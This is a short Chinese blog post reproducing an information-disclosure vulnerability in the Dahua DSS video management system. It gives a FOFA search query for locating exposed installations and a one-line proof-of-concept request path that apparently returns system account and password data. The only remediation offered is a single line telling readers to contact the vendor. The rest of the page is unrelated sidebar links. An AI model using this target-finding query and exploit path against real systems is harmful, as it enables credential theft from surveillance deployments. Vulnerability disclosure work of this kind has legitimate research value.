【漏洞复现】大华DSS视频管理系统信息泄露漏洞

  • 开发
  • 22

Nx01 产品简介

        大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。

Nx02 漏洞描述

        大华DSS视频管理系统存在信息泄露漏洞,攻击者可以利用这个漏洞获取到系统的账号和密码信息。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 DSS 视频管理系统"

Nx04 漏洞复现

POC:

/admin/cascade_/user_edit.action?id=1

Nx05 修复建议

建议联系软件厂商进行处理。

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-02-21 17:44:02       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-02-21 17:44:02       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-02-21 17:44:02       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-02-21 17:44:02       20 阅读

热门阅读

  2. P1162 填涂颜色

    2024-02-21 17:44:02       30 阅读

  4. Nginx 的基本介绍和使用

    2024-02-21 17:44:02       27 阅读

  5. SpringBoot使用MQTT详解含完整代码(值得珍藏)

    2024-02-21 17:44:02       26 阅读

  7. 安卓11-HDMI插拔检测流程

    2024-02-21 17:44:02       24 阅读

  12. Python 安装和使用的IDE

    2024-02-21 17:44:02       25 阅读

  13. 微服务开发工具及环境搭建

    2024-02-21 17:44:02       34 阅读

  19. php 函数 三 公钥私钥

    2024-02-21 17:44:02       34 阅读

  22. 【ES】es查询term、match、match_phrase、mast_not、mast...

    2024-02-21 17:44:02       32 阅读

  25. Linux的expect工具完成命令行参数传递及可执行文件注入shell脚本

    2024-02-21 17:44:02       32 阅读

  26. Python自动化部署与配置管理:Ansible与Docker

    2024-02-21 17:44:02       25 阅读

  27. python3调用阿里云openapi脚本 - 生产环境

    2024-02-21 17:44:02       29 阅读

  29. 本地模拟发送、接收RabbitMQ数据

    2024-02-21 17:44:02       34 阅读